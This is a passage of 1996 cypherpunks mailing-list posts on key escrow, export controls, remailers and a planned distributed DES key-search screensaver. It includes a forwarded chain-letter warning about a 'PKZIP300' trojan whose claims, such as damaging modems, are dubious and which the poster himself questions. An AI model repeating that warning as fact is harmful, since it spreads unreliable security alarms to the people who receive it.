Sounds like fun, actually -- are you volunteering to write it?

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Thu, 3 Oct 1996 23:25:13 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Clipper III on the table
In-Reply-To: <Pine.3.89.9610011613.A7805-0100000@netcom14>
Message-ID: <199610021904.MAA06902@server1.chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> > > Even the promise (of no limits) might suffice.
> > 
> > Don't bet on it.
>
> Allow me to say here that I do not belive that Netscape will be amongst
> those fooled so easily. But IBM, HP, TIS, and others have already been
> fooled. The USG does not need to get every software company to agree with

I don't think it's a matter of being fooled.

IBM and HP have very large federal systems divisions.  They are also
fighting for more (and hold on to current) financial sector customers.

The government currently has a huge strangle hold on that market in
terms of regulatory agencies/policies that will not be loosened very
easily (assuming one believes that it should be loosened, which I do
not necessarily agree with).

Therefore, it is definitely in IBM's and HP's interest to build
systems that the government likes.  It is also important for them to
point out that such systems are very vulnerable given the previous
policies.  This new GAK ("GAKR"??) will actually be quite appropriate
in terms of a right "balance" for the financial sector.  In fact, I
would expect the financial sector to have to open its transactions to
not just the FBI/CIA/DEA, but the SEC and other non-law-enforcement
agencies.

The question is:  Why is this GAKR appropriate for the rest of us?
Why do we want it?

It really does harm the "small" companies like Netscape because they
don't have as much resources to establish the infrastructure
necessary for GAKR, and their target markets are not in bed with the
local governments.  Instead, their target markets are anyone who
wants to buy, and no one, when it comes to their personal privacy
would want to buy something to which the U.S. government has a
guaranteed backdoor.

I predict, therefore, Netscape and RSA would NOT capitulate to this
latest bitter carrot.

Ern






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deana Holmes" <mirele@xmission.com>
Date: Thu, 3 Oct 1996 11:02:13 +0800
To: "John C. Randolph" <cypherpunks@toad.com
Subject: Re: Utah as a Religious Police State
Message-ID: <199610021832.MAA17915@mail.xmission.com>
MIME-Version: 1.0
Content-Type: text/plain


On  2 Oct 96 at 8:47, John C. Randolph wrote:

> 
> Moroni says:
> 
> >I never cease to be surprised by the interest that gentiles show
> >in working mormon communities while totally neglecting their own
> >failing areas.
> 
> I don't do a lot of nit-picking on this mailing list, but:
> 
> I am a Jew. *You* are a gentile. So are all the rest of the mormons.
> Get this point straight.

Uh, in Utah, Jews are Gentiles. No lie.

Deana

Deana M. Holmes
April 1996 poster child for clueless $cientology litigiousness
alt.religion.scientology archivist since 2/95
mirele@xmission.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 3 Oct 1996 11:09:17 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: How might new GAK be enforced?
Message-ID: <v02130501ae780d674e8a@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Richard Coleman writes:
>
>: I've always wondered why large companies just don't write some type of
>: standards document for crypto to interoperate, and then have each
>: foreign branch write (or contract out) their own version.  I don't see how
>: this violates export laws in any way.
>
>The definition of ``software'' in the ITAR includes ``algortihms'' and
>``logic flow'', so I suspect that the ODTC wouuld claim that the
>standards are software that cannot be ``exported'' without a licnese.

No, I don't think they'd be able to stretch things that far.  If designs
for software merely defined a plug-in interface (not specifically
referencing crypto) it would be very difficult to prevent.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 3 Oct 1996 10:29:22 +0800
To: cypherpunks@toad.com
Subject: DES CRACKING SCREENSAVER, was: Can we kill single DES?
Message-ID: <v02130502ae780e6a8b65@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>On Wed, 2 Oct 1996, Frank Andrew Stevenson wrote:
>
>> DES CRACKING SCREENSAVER
>[...]
>>the screensaver itself can simply display a rotating globe,
>> where the different densities of global usage is given in colour shades,
>>showing
>> an inverse sunclock of sorts. I think such a concept might give the
>>DES-cracking
>> screensaver a critical mass.

Suggest you make it a plug-in module to one of the popular screen savers
(e.g., After Dark).  I'd run it.




PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 3 Oct 1996 12:59:27 +0800
To: Ryan Russell/SYBASE	  <Ryan.Russell@sybase.com>
Subject: Re: How might new GAK be enforced?
Message-ID: <v02130503ae781347afee@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Tim May asks:
>
>: Any other ideas on how the government plans to enforce GAK, to make GAK the
>: overwhelmingly-preferred solution?
>
>The problem seems somewhat analogous to the software copy protection
>problem and maybe the enfocement will be similar: make "examples" of a
>few high profile offenders who are exchanging blatantly un-GAKed
>traffic with foreigners. This assumes they fine tune the law to make
>such behavior illegal without having to prove you yourself exported
>the stuff to them. Wonder what the Supremes will say to that.

Another possible monkey wrench is to send non-GAK messages containg random
data.  Since the entropy of encrypted and RNG data should be identical you
can always maintain the messages contain nothing at all and cannot produce
a decrypt key since none exists.

>
>But that's not the end of the story. If there is lots of GAK encrypted
>traffic flowing about, then encrypted traffic in general is no longer
>noteworthy. So as long as your traffic looks like GAK, you won't be
>hassled until they try to read your traffic.

See above comment.

>
>So it's possible that products will appear that use pseudo-GAK
>protocols -- they look just like their GAKed cousins but the GAK
>fields contain plausiable garbage instead of keys. It could even
>turn out to be a vendor "quality control" thing -- oops, the GAK
>was supposed to work but...
>
>You couldn't do that with Clipper (except via Matt Blaze's brute
>forcing of the LEAF checksum) because the crypto wouldn't decrypt a
>packet with an invalid LEAF checksum. Since it was a sealed hardware
>module, implementers had no choice but to play by those rules. There's
>no such enforcable limitation on commercial software implementations.

Another casuality could be anonymity.  Once GAK is in place, look for a
requirement for Clipper cards in order to access ISPs.

-- Steve




PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Thu, 3 Oct 1996 13:08:38 +0800
To: cypherpunks@toad.com
Subject: [NOT NOISE] Jena Temailer
In-Reply-To: <199609290412.VAA20552@dfw-ix3.ix.netcom.com>
Message-ID: <199610022000.NAA07022@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


 stewarts@ix.netcom.com wrote:

 s> At 04:10 PM 9/28/96 -0700, anonymous wrote:
 >> My first thought was to have them sent to a non-autopinging *.test ng
 >> via a well-tested parsing mail2news gate, but some autopingers ping
 >> ALL *.test traffic passing through a site.  If these ping messages
 >> didn't get automatically bitbucketed at the remailer site, this could
 >> be a problem for the operator.

 s> Most of the autopingers will ignore messages with "ignore" in
 s> the Subject: line.

We understand that, but the Jenaer Remailer configures the outgoing
message, which is essentially a digest of a user's recent mail, and
therefore the requestor has no control over the Subject: field.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Thu, 3 Oct 1996 16:41:32 +0800
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: White House crypto proposal -- too little, too late
In-Reply-To: <199610020350.UAA08078@abraham.cs.berkeley.edu>
Message-ID: <199610021807.NAA04144@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > Date: Tue, 1 Oct 1996 14:56:21 -0700 (PDT)
> > From: Declan McCullagh <declan@well.com>
> > 
> > "What?" I asked. "Unless you're talking about import restrictions."
> > 
> > "Exactly," he said.
> > 
> > -Declan
> 
> I don't doubt that they can do this if they really want to, but I
> wonder what legal basis they will use for import restrictions.
> 
> Are there any current import restrictions for products on can legally
> manufacture, sell, and use in the United States?

As of now, there are no restrictions on importation and utilization of any
crypto in the United States.  However, if certain people have their way,
this will change quickly.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Lojewski <lojewski@serbia-c.it.earthlink.net>
Date: Thu, 3 Oct 1996 10:55:19 +0800
To: cypherpunks@toad.com
Subject: Your Majordomo request results: unsubscribe my ass
Message-ID: <1.5.4.32.19961002201612.006ba6c4@mail.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain



I had sent this one in also...

>Date: Mon, 30 Sep 1996 20:11:21 -0700 (PDT)
>To: lojewski@switzerland-c.it.earthlink.net
>From: Majordomo@toad.com
>Subject: Your Majordomo request results: unsubscribe my ass
>Reply-To: Majordomo@toad.com
>
>--
>
>Your request of Majordomo was:
>>>>> unsubscribe cypherpunks lojewski@germany-c.it.earthlink.net
>Your request to Majordomo@toad.com:
>
>	unsubscribe cypherpunks lojewski@germany-c.it.earthlink.net
>
>has been forwarded to the owner of the "cypherpunks" list for approval. 
>This could be for any of several reasons:
>
>    You might have asked to subscribe to a "closed" list, where all new
>	additions must be approved by the list owner. 
>
>    You might have asked to subscribe or unsubscribe an address other than
>	the one that appears in the headers of your mail message.
>
>When the list owner approves your request, you will be notified.
>
>If you have any questions about the policy of the list owner, please
>contact "cypherpunks-approval@toad.com".
>
>
>Thanks!
>
>Majordomo@toad.com
>Your request of Majordomo was:
>>>>> 
>Your request of Majordomo was:
>>>>> ---------------------------------------------------------
>END OF COMMANDS
>
>

---------------------------------------------------------
Tom Lojewski - ProNet Consulting - lojewski@earthlink.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 3 Oct 1996 01:13:59 +0800
To: cypherpunks@toad.com
Subject: REM_ail
Message-ID: <199610021343.NAA08231@pipe3.ny3.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-8-96. VV: 
 
   "The Remailer Is Dead, Long Live the Remailer. Life After 
   Penet."  By Dave Mandl (Excellent, Dave, yes!) 
 
   By the strict standards of the cypherpunks, a loosely 
   knit affinity group of the Net's most radical and 
   technoliterate privacy advocates, Penet's security was 
   actually on the flimsy side. Its Achilles' heel was the 
   file --  just begging to be subpoenaed -- that linked 
   users' real names to their Penet pseudonyms. 
   Cypherpunk-run remailers, on the other hand, generally 
   leave no trace of the sender's true identity. In 
   addition, cypherpunk remailers can be "chained" -- 
   messages can be routed through several far-flung 
   remailers before reaching their final destination, making 
   message tracing all but impossible, even for the remailer 
   operators. 
 
   ----- 
 
   http://jya.com/remail.txt 
 
   ftp://jya.com/pub/incoming/remail.txt 
 
   REM_ail




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 3 Oct 1996 10:43:54 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: NYT on IBM GAK
Message-ID: <199610022104.OAA14485@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:26 AM 10/2/96 -0700, Lucky Green wrote:
>
>
>On Wed, 2 Oct 1996, John Young wrote:
>
>>    The New York Times, October 2, 1996, pp. D1, D8. 
>>    Executives of the International Business Machines 
>>    Corporation said late yesterday that they were still lining 
>>    up the final list of companies in the alliance. Those 
>>    involved will include Digital Equipment and smaller 
>>    data-security companies including RSA Data Security, Cylink 
>>    and Trusted Information Systems. 
>
>We are in deep trouble.
>--Lucky

Wouldn't a letter-writing campaign be in order here?  

How often do these companies get protest letters?  Generally, my experience 
has been that people actually listen to such objections, if for no other 
reason than they are usually so rare.  The moment I first heard of 
"Clipper," I looked up the manufacturer of the "Clipper" microprocessor 
(assuming that there was a connection) and called that company, fully 
prepared to "ream them a new one!"  It turned out that they had nothing to 
do with the chip, etc, appreciated my call, and were entirely sympathetic.  

While that was an uninvolved company, I think it's likely that some 
corporate decisions are based on the assumption that the public won't 
notice.  Give them enough feedback and they'll react.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 3 Oct 1996 11:03:45 +0800
To: "Timothy C. May" <cypherpunks@toad.com
Subject: Re: How might new GAK be enforced?
Message-ID: <199610022113.OAA15158@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:55 PM 10/1/96 -0800, Timothy C. May wrote:
>At 8:32 PM -0800 10/1/96, jim bell wrote:
>>At 09:39 AM 10/1/96 -0800, Timothy C. May wrote:
>
>>>(Else what's to stop Giant Corporation from using Non-GAKked software
>>>within the U.S., which is perfectly legal (under the "voluntary" system),
>>>but then "happening" to have their foreign branches and customers obtain
>>>"bootleg" versions at their end? All it takes is a single copy to get out,
>>>and be duplicated a zillion times. Voila, interoperability, with the only
>>>"crime" being the first export...which is essentially impossible to stop,
>>>for so many reasons we mention so often. Conclusion: Government must make
>>>this very mode illegal, perhaps by making it a conspiracy to thwart the
>>>export laws....)
>>
>>If this solution were really practical, it would have been tried already.
>
>And just what would you call PGP?

The "impractical" I was referring to is the impracticality of the government 
implementing and enforcing restrictions on communications using (non-GAK) 
crypto.  The only place this seems to exist is in ham radio.

The crypto itself is eminently practical, as the PGP example makes 
absolutely clear.


>Long before the MIT deal, people in the U.S. were using their "OK in
>America" (not counting RSADSI's issues) software to communicate with
>"illegally exported" copies in foreign lands.
>
>This model--leaking a U.S. version and then communicating freely between
>U.S. sites and the "leakee" sites--worked for PGP. I believe the USG fears
>this will happen again.
>
>Hence my speculation that they may try to illegalize the mere communication
>with an offending product.

"I predict they won't be able to do it."



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Thu, 3 Oct 1996 23:17:04 +0800
To: cypherpunks@toad.com
Subject: Can we kill single DES? #2
Message-ID: <199610021852.LAA28445@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Yesterday I posted 'Can we kill single DES?', and I count about 20 
responses, counting both those to the list, and those to me personally.

One offer was made of a $1000 reward in return for a crack, if the
offerer could make publicity hay of the offer (no, I don't have a problem
with that, but I'd like it set up so that others could add to the reward as
well). If the reward got big enough ($10k?) I think it would be a 
major incentive for otherwise uninterested people to run the screen
saver. On the other hand, it might get into legal hassles - I don't know.

The total cpu power pledged at the moment could sweep the key
space in 300-400 years, if my speed estimates are correct. 

I'm  concerned that the key scheduling may be worse than I estimated 
in my earlier letter - Phil Karn's code to generate the key schedule takes 
about 150x as long as my code takes to test the key. However, neither he 
nor I have bothered yet to optimize this part of the code, or reduce it to
assembler. It looks like I can get this part down to two instructions
per round, at least most of the time.

-----------

I'm really concerned about the problem of a search failing, or 
succeeding only after too long a time. Perry's proposal of about
a month of real time is on the right order, though I could see up
to 3 months being possible.

Here's what I'm thinking of doing:

1. Writing a prose description of the platform independent speedups.

2. Writing a proposal for a client-server protocol for doling out
   keyspace and returning results. Aside from the direct Internet
   interface, there will also be a mechanism for i/o via plain text -
   suitable for cut-and-paste, or simple CLI interfaces.
  
3. Writing a generic 'C' implementation of the keysearch client and server, 
   which demonstrates the i/o and the various speedups. This should
   be highly portable (but probably non-exportable). You'd also be able
   to search randomly, or from a designated starting point.

4. Work on the screen-saver based version of the client.

I'm still very interested in hearing about any hardware based 
approaches actually underway - not a pile of wild-assed guesses
and hopes.

Those who want to look at a fast DES in assembler should check 
out Phil's 386 version, which includes both generic C and a variety
of assembler implementations for the actual encryption step. See:
ftp://idea.sec.dsi.unimi.it/pub/security/crypt/code/des386.zip

Phil also has a Pentium version (a little slower than mine) 
which he mails to US citizens.

Peter Trei
trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 3 Oct 1996 11:56:29 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: This list is a joke
In-Reply-To: <6yF6uD2w165w@bwalk.dm.com>
Message-ID: <Pine.BSF.3.91.961002150248.21385B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 1 Oct 1996, Dr.Dimitri Vulis KOTM wrote:

> Dave Temple <dtemple@ashland.edu> writes:
> 
> > When I subscribed to this list, I thought it would have decent
> > communication on worthwhile topics.  I've come to realize though that 75%
> > of the messages I receive are from people whining like 4 year olds.  I am
> > making a huge assumption in saying that most of the people on this list
> > are adults.  It is time to start acting like it.
> 
> When I joined this mailing list, it had plenty of technical discussions
> posted by people knowledgeable in cryptography. They have all since left.
> 

Please unsuscrive, er, unimbibe, er, unarrive ...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 3 Oct 1996 03:25:45 +0800
To: cypherpunks@toad.com
Subject: SYN_not
Message-ID: <199610021503.PAA18426@pipe2.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   10-1-96: 
 
   "Check Point to Provide Safeguard Against TCP SYN 
   Flooding." 
 
      The new module, now available free of charge on Check 
      Point's Web site (http://www.checkpoint.com), provides 
      protection against this denial of service attack, which 
      has crippled several ISPs in recent weeks. 
 
   "Certicom Introduces Elliptic Curve Cryptosystem 
   Instruction To Its Security Classroom."  
 
      It has launched new information about its Elliptic Curve 
      Cryptosystem on the Information Security Classroom 
      section of its web site (www.certicom.ca). 
 
   "IBM to herd cave-in cats for rat encryption." 
 
      IBM will be joined by Digital, TIS but few others. An 
      executive at TIS declined to comment on whether it is 
      involved in the IBM cave-in. The company is in a 
      quiet period before making an IPO based on government 
      bribery. 
 
   "Battle brewing over gov.crypto bribery." 
 
      Last week, the DARPA announced it has awarded Trusted 
      Information Systems, Inc. a two-year, $1.5 million 
      contract to develop what it calls security wrappers for 
      a Java Prototype System as well as one for the Unix 
      operating system. 
 
   ----- 
 
   http://jya.com/synnot.txt  (15 kb for 4) 
 
   ftp://jya.com/pub/incoming/synnot.txt 
 
   SYN_not 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 3 Oct 1996 10:07:21 +0800
To: cypherpunks@toad.com
Subject: The Right to Keep and Bear Crypto
Message-ID: <v02130500ae78384961a4@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


A well-regulated Militia, being necessary to the security of a free State,
the right of the people
 to keep and bear Arms, shall not be infringed.
                                 --Constitution of the United States of America,
                                 Amendment II, 1791

I'm not a consitiutional scholar, but it seems to me that since the
government has already classed crypto as arms via ITAR and since the I am
guaranteed the right to bear arms I choose to bear the crypto of my choice
as part of my arsonal.

The founding father's believed that the citizen's right to arms is all that
may ultimately stand in the path of a government no longer duly
constituted.  In such a case a manditory GAK system could render all but
the government's crypto impotent, disarming the populace of this valuable
weapon.

I therefore propose that since only strong crypto may be secure against the
government in such a circumstances the government may not deny me the right
to keep and bear the strong crypto of my choosing, unless I use it for
criminal purpose.  Futher in order that citizen militias employing strong
crypto be well regulated (e.g., well maintained) the practice of using
strong crypto by such citizens must be regular and wide spread.

-- Steve



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to prescription DRUGS.

"Of all tyrannies, a tyranny sincerely exercised for
 the good of its victims may be the most oppressive."
    -- C.S. Lewis

"Surveillence is ultimately just another form of media, and thus, potential
entertainment."
    -- G. Beato






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Otto Matic" <ott0matic@hotmail.com>
Date: Thu, 3 Oct 1996 11:54:40 +0800
To: cypherpunks@toad.com
Subject: Re: FW: FYI-WARNING (fwd) Zip300 Trojan Horse?
Message-ID: <96Oct2.155131pdt.542526(1)@constitution.hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


Is this for real?  If not, forgive me for posting this to your list.

>From:Matthew Hayton <mhayton@vt.edu>
>Subject: FW: FYI-WARNING (fwd)
>Sender: owner-sfraves@hyperreal.com
>Precedence: bulk
>>From: "Bayless, Marilyn J. Capt" <BAYLESMJ@CISF.AF.MIL>
>>To: "hayton, todd" <mhayton>
>>Subject: FW: FYI-WARNING (fwd)
>>Date: Wed, 02 Oct 96 11:40:00 MDT
>>Encoding: 63 TEXT
>>
>>
>>
>> ----------
>>From: Bailey, Craig E. Mr.
>>To: Bosse, Roger H., Civ; Ferribee, George, Civ; Caracillo, Mike R. Mr.; 
>>Fleming, Kirk Mr.; Guthrie, Michael P. Mr.; Kounter, Mike J. Mr.; Allen, 
>>Scott C., Capt\DET1; Thomas, Christopher  2Lt; 'Kelch, William  Mr.'; Einmo, 
>>Kent  Maj; Myers, Gale  Maj; 'Gribble, TSgt (SEIT)'; 'Manas, Capt (SEIT)'; 
>>SSSGp (All CISF Bldg Pers)
>>Subject: FW: FYI-WARNING (fwd)
>>Date: Wednesday, October 02, 1996 11:33AM
>>
>>
>>
>> ----------
>>From:  Sanders, Timothy  SrA
>>Sent:  Wednesday, October 02, 1996 9:00 AM
>>To:  Gebhardt, Dean MSgt; Potter, Rodney MSgt; Bailey, Craig E. Mr.; 
>>Guthrie, Michael P. Mr.; Armstrong, Harry  SSgt; Drent, Shirley  Ms DoD; 
>>McFadden-Garnier, Jacquelin MS; Slomski, John  MSgt; Burgtorf, Christina 
>> SSgt; Brown, James  TSgt; Malloy, Archie  Mr DoD; Nelson, Andrew  A1C; 
>>Lewis Benjamin  SSgt; Scheer, Brian  TSgt; Bundrick, Christopher  SSgt; 
>>Mullens, Carolyn  Ms. DoD; Wohr, Charles TSgt; Hohle, Duane  Sgt; Mizell, 
>>David  SrA; Morgan, Dwayne SSgt; Holland, Gregory  SSgt; Deeney, James 
>> TSgt; Garn, John  MSgt; Hilyard, John  SrA; Sumner, Jennifer  Amn; Dean, 
>>Laura  TSgt.; Dozier, Larry  SSgt; Estensen, Michael  SSgt; Heckle, Megan 
>> Ms.; Imel, Michael SrA; Michniewicz, Mark  MSgt; Schueckler, Michael J. 
>>A1C; Mantell, Patrick  SrA; Beckwith, Ralph  Mr DoD; Daniel, Shirley  SSgt; 
>>Lopez, Steven  MSgt; Dinsmore, Tina SrA; Sanders, Timothy  SrA; Thompson, 
>>William  TSgt; Burkett, Brian  SrA; Richardson, Jackie  MSgt; Shelton, Jay 
>> MSgt; Martinez, Jessie  SrA; Ooley, Matt  TSgt; Godfroy, Rainette  Ms DoD; 
>>Herndon, Richard  Mr. DoD; Timm, Roseangeli  TSgt; Abernathy, Samuel  MSgt; 
>>Greenwood, James  SSgt; Young, Malcolm  MSgt; Bookout, Bruce  Capt; Stith, 
>>Carolyn  SSgt; Feller, Dean  SMSgt; Lemoine, David  TSgt; Johnson, Fred 
>> SrA; Wilkinson, Heather  Capt; Dias, John  SSgt; Hewitt, James  SrA; 
>>Bianchi, Kevin  SrA; McDowell, Michael TSgt; Wilson, Steven  Capt; 
>>Armstrong, Connie  Ms DoD; Akin, Henry  TSgt.; Murray, Mark  SMSgt; Parsons, 
>>Vicki  Capt; Brown, Johnnie  TSgt; Floyd Gregory SSgt
>>Subject:  FW:  FYI-WARNING (fwd)
>>
>>Received this on a courtesy copy this morning, once again some of you may 
>>get duplicates, but this needs to go far and wide.
>>
>>SrA Sanders
>>21 Unit Security
>> ----------
>>>         DO NOT DOWNLOAD ANY FILE NAMED PKZIP300 REGARDLESS OF EXTENSION.
>>>
>>>         A NEW Trojan Horse Virus has emerged on the internet with the name
>>>         PKZIP300.ZIP, so named as to give the impression that this file is 
>>a
>>>          new version of the PKZIP software used to "zip" compressed files.
>>>
>>>         DO NOT DOWNLOAD THIS FILE UNDER ANY CIRCUMSTANCES!!
>>>         if you install or expand the file, the virus will wipe your hard 
>>disk
>>>
>>>         clean and affect modems at 14.4 and higher.  This is an extremely
>>>         destructive virus and there is NOT yet a way of cleaning this one
>>>         up.
>>>
>>>         PLEASE PASS THIS ON TO ANYONE YOU KNOW.
>>
>>
>
>


otto
=-=-=-=-=-
Otto Matic

"Fuckin' A, Miller!"  Bud, Repo Man


---------------------------------------------------------
Get Your *Web-Based* Free Email at http://www.hotmail.com
---------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 3 Oct 1996 10:24:59 +0800
To: cypherpunks@toad.com
Subject: FUCK!!!!!!;-)
Message-ID: <v03007800ae787c226c62@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


It seems to be worse than we thought?

Apple and *Sun*?

Doesn't *Whit Diffie* work for Sun?

Curioser and curioser...

Cheers,
Bob Hettinga

--- begin forwarded text


From: sombody...
Date: Wed, 2 Oct 1996 15:41:38 -0400
To: rah@shipwright.com
Subject: FUCK!!!!!!;-)

NEW YORK AND PARIS--(BUSINESS WIRE)--Oct. 2, 1996--Eleven major information
technology vendors and user organizations today announced the formation of an
alliance to develop an exportable, worldwide  approach to strong encryption.
 The goal of the alliance is to enable companies to conduct secure
international electronic commerce.

The alliance was formed in response to demand from customers who  are
conducting more and more of their business processes  electronically.
 Internationally available strong encryption would  enable these firms to
send sensitive information securely over the  Internet and other
international networks.

The companies forming the alliance will achieve this by  developing modern,
high-level cryptographic "key-recovery"  solutions that meet the requirements
of business and could allow easing of  restrictions of cryptographic
import/export around the world.

Members of the alliance are Apple Computer, Inc., Atalla, Digital Equipment
Corporation, Groupe Bull, Hewlett-Packard Company, IBM, NCR Corp., RSA, Sun
Microsystems, Inc., Trusted Information Systems and  UPS.  The alliance is
also open to other companies with an interest  in key recovery.

"Keys" are strings of computer code that lock and unlock data.   Key recovery
is an approach that permits the recovery of lost or  damaged keys without the
need to store or "escrow"  them with a third party.  This approach could also
meet the needs of law enforcement to act under the authority of a court order
without risking the  confidentiality of business data.

Modern, high-level cryptography works to ensure four critical  elements of
security -- Confidentiality: prevents against  unauthorized parties from
seeing information; Integrity: determines  that information has not been
changed during transit; Authentication: verifies the identity of the user and
the user's eligibility to  access and use information; Non-Repudiation:
provides evidence that a transaction took place, for example, that a customer
actually placed  an order.

"Apple recognizes and supports the need for key recovery, and we  are pleased
to be a part of the alliance," said Ellen Hancock, chief  technology officer
and executive vice president of R&D for Apple  Computer, Inc.  "We believe
that this alliance will help industry  lead in developing solutions for
secure transactions while prompting  the evolution of the Internet as a
business environment."

"Securing commerce over the Internet using strong encryption  technologies
will require a common set of standards and approaches to fundamental security
issues such as key recovery and key management," said Robert Gargus, Atalla
president and general manager.  "Once  these standards are accepted and
globally deployed, public networks  such as the Internet will provide a
secure, multi-national commercial trading environment for worldwide
electronic commerce."

"The alliance has struck a balance between government and  business needs,"
said CommerceNet Chairman Marty Tenenbaum.   "Allowing encryption to this
degree opens the door to the  proliferation of electronic commerce."

"Strong encryption is a necessary element in delivering secure  network
business solutions to our customers worldwide.  Key recovery  is a mechanism
that addresses government policy concerns about the  export of strong
encryption while at the same time meeting growing  commercial needs," said
Sam Fuller, vice president and chief  scientist for Digital Equipment
Corporation.  "Digital sees this  alliance as an effective means to develop
open and interoperable key  recovery standards."

"Electronic Commerce is planned to be $1T by the year 2010  according to
experts.  The capability to have secured transactions is a prerequisite for
the market," said Alain Couder, senior executive  vice president of Groupe
Bull.  "Groupe Bull had been actively  involved in the search for a solution
to provide a balance between  the legitimate need for users to have privacy,
for corporations to  protect their trade secrets and relationships and for
governments to  maintain national security.  Bull has the ambition to be a
leading  provider of this capability with key encryption technology, smart
 cards and its Internet products and services."

"HP is pleased to be a founding member of the alliance," said  Richard W.
 Sevcik, HP vice-president and general manager of the  Systems Technology
Group.  "Exportable strong encryption is a key  enabler for international
electronic commerce and provides businesses with the ability to perform
secure transactions and other  communications regardless of geography.  Key
recovery is one of  several technologies that will be important."

"Key recovery will truly open the Internet for serious business," said Irving
Wladawsky-Berger, general manager, IBM Internet Division. "Once businesses
are confident that their electronic transactions are safe and they control
the recovery of keys, a flood of new market  opportunities will open.  The
Internet is rapidly shifting from a  place to browse for information to an
environment for conducting real business."

"Export controls are a fact of life," said Jim Bidzos, president  of RSA Data
Security.  "The key recovery alliance's approach will  allow companies to use
